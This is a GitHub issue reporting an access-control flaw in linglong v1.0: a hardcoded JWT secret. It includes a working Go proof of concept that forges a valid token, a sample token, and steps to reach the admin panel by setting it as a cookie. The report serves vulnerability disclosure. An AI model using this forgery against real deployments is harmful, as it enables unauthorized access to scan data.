linglong
linglong copied to clipboard
An invalid access control vulnerability was found
[Suggested description]
Attackers can directly construct the corresponding JWT authentication information and enter the background to view, add tasks and scan results
[Vulnerability Type]
Incorrect Access Control
[Vendor of Product]
https://github.com/awake1t/linglong/
[Affected Product Code Base]
v1.0
[Affected Component]
Use the following code to generate the corresponding JWT data
package main
import (
"fmt"
"github.com/dgrijalva/jwt-go"
"time"
)
var jwtSecret = []byte("213123dd1")
type Claims struct {
Username string `json:"username"`
Password string `json:"password"`
jwt.StandardClaims
}
func main() {
token, err := GenerateToken("linglong","bingan")
if err != nil {
fmt.Println("Linglong Token 生成失败")
}
fmt.Println("TOKEN: " + token)
fmt.Println("HEADER: ")
fmt.Println("Authorization: " + token)
}
func GenerateToken(username, password string) (string, error) {
//fmt.Println("GenerateToken")
nowTime := time.Now()
expireTime := nowTime.Add(3 * time.Hour)
claims := Claims{
username,
password,
jwt.StandardClaims{
ExpiresAt: expireTime.Unix(),
Issuer: "linglong",
},
}
tokenClaims := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)
token, err := tokenClaims.SignedString(jwtSecret)
return token, err
}
data:image/s3,"s3://crabby-images/ce9ee/ce9ee317dce2435dff639f65d9394c34aa90fd85" alt=""
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imxpbmdsb25nIiwicGFzc3dvcmQiOiJxYXhzZWMiLCJleHAiOjE2NTAyNzYwOTAsImlzcyI6Imxpbmdsb25nIn0.jCiOvtQkXyQXsqzqWY8FdN7yiyTTj-piIo_aSKF3v6Q
Open Linglong site and write JWT data into the cookie
data:image/s3,"s3://crabby-images/749ea/749ea8151b63d8b6bb732672423a9ccb79689e0f" alt="image"
Open URL: /#/welcome
You can enter the Lingling background
data:image/s3,"s3://crabby-images/ccd00/ccd00a9029a66f0ad3819b3c3f3eb4c216fd71fd" alt="image"
[Defective code]
/pkg/utils/jwt.go
data:image/s3,"s3://crabby-images/a01cd/a01cd1d73c93f677f7ef07badd37c6479988617c" alt="image"
道理我都懂 好奇为什么师傅不用中文啊
道理我都懂 好奇为什么师傅不用中文啊
因为交CVE..
哈哈哈 我猜也是 有cve编号了吗